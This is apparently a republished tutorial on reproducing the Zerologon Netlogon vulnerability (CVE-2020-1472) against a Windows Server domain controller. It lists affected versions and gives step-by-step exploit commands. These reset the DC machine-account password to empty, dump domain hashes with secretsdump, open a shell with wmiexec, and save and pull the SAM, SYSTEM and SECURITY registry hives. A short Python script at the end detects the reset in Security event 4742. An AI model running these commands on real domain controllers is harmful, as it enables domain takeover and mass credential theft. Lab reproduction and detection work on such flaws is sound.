How to reproduce the Netlogon privilege escalation vulnerability CVE-2020-1472

2025-01-17 Update. From: SLTechnology News&Howtos, Shulou (Shulou.com), 05/31

Many newcomers are unclear about how to reproduce the Netlogon privilege escalation vulnerability CVE-2020-1472. To help with that, this article walks through the process step by step.

1. Reproduction environment

DC:

OS: Windows Server 2012

IP: 192.168.236.132

Attack machine:

OS: Kali

IP: 192.168.236.130

2. Affected versions

Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)
Windows Server, version 2004 (Server Core installation)

3. Reference article on building the domain controller environment

Sectool/251828.html

4. Reproduction process

4.1 Vulnerability verification

POC link

4.2 Vulnerability exploitation

Install the latest Impacket first; otherwise an error will be reported.

4.2.1 Download the exploit

EXP download

4.2.2 Set an empty password

python3 cve-2020-1472-exploit.py WIN-F6STUQIU7D8 192.168.236.132

4.2.3 Get the hashes

Change into impacket/examples:

python3 secretsdump.py DOMAIN/WIN-F6STUQIU7D8\$@192.168.236.132 -just-dc -no-pass

4.2.4 Get a shell

python3 wmiexec.py -hashes DOMAIN/administrator@IP

4.2.5 Get the original hash

reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
get system.save
get sam.save
get security.save
del /f system.save
del /f sam.save
del /f security.save
exit

4.2.6 Parse the hashes

Save the $MACHINE.ACC section: XXXXXXXXXXXXXX:XXXXXXX

python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

4.2.7 Restore the hash

Restore link

python3 reinstall_original_pw.py DC_NETBIOS_NAME DC_IP_ADDR

4.2.8 Verify the recovery

Run the hash-dumping command again to verify that the restore succeeded:

python3 secretsdump.py DOMAIN/DC_NETBIOS_NAME\$@DC_IP_ADDR -just-dc -no-pass

5. Remediation advice

Official remediation guidance
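
On the detection side, the password reset in step 4.2.2 leaves a trace in the DC's Security log: event 4742 (a computer account was changed) for the DC's own machine account, with ANONYMOUS LOGON as the subject and a new "Password Last Set" value. The Python below is an added example, not part of the original article; the event records are constructed samples and the DC inventory set is an assumption.

```python
# Added example (not from the original article): triage DC Security-log records
# for the machine-account password reset performed in step 4.2.2.
# Field names follow the EventData of Security event 4742; the records are
# constructed samples and the DC inventory is an assumption for this lab.
ANONYMOUS_SID = "S-1-5-7"                 # well-known SID of ANONYMOUS LOGON
DOMAIN_CONTROLLERS = {"WIN-F6STUQIU7D8"}  # assumption: known DC host names

SAMPLE_EVENTS = [  # constructed
    {"EventID": 4742, "SubjectUserSid": "S-1-5-7", "SubjectUserName": "ANONYMOUS LOGON",
     "TargetUserName": "WIN-F6STUQIU7D8$", "PasswordLastSet": "9/20/2020 3:14:07 PM"},
    {"EventID": 4742, "SubjectUserSid": "S-1-5-7", "SubjectUserName": "ANONYMOUS LOGON",
     "TargetUserName": "ws-042$", "PasswordLastSet": "9/20/2020 3:20:41 PM"},
    {"EventID": 4742, "SubjectUserSid": "S-1-5-21-1111-2222-3333-500",
     "SubjectUserName": "administrator", "TargetUserName": "WIN-F6STUQIU7D8$",
     "PasswordLastSet": "-"},
    {"EventID": 4624, "SubjectUserSid": "S-1-0-0", "TargetUserName": "ANONYMOUS LOGON"},
]


def classify(event):
    """Return 'high', 'review' or None for one parsed event record."""
    if event.get("EventID") != 4742:        # 4742: a computer account was changed
        return None
    if event.get("SubjectUserSid") != ANONYMOUS_SID:
        return None
    # "-" in PasswordLastSet means the password attribute was not touched.
    if event.get("PasswordLastSet", "-").strip() in ("", "-"):
        return None
    host = event.get("TargetUserName", "").rstrip("$").upper()
    # A DC's own account reset by an anonymous subject is the Zerologon pattern;
    # the same event on other machine accounts is queued for manual review.
    return "high" if host in DOMAIN_CONTROLLERS else "review"


def triage(events):
    """Return (severity, target account) pairs, 'high' findings first."""
    findings = []
    for ev in events:
        severity = classify(ev)
        if severity:
            findings.append((severity, ev["TargetUserName"]))
    return sorted(findings, key=lambda f: f[0] != "high")


if __name__ == "__main__":
    for severity, account in triage(SAMPLE_EVENTS):
        print(f"{severity:6} {account}")
```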
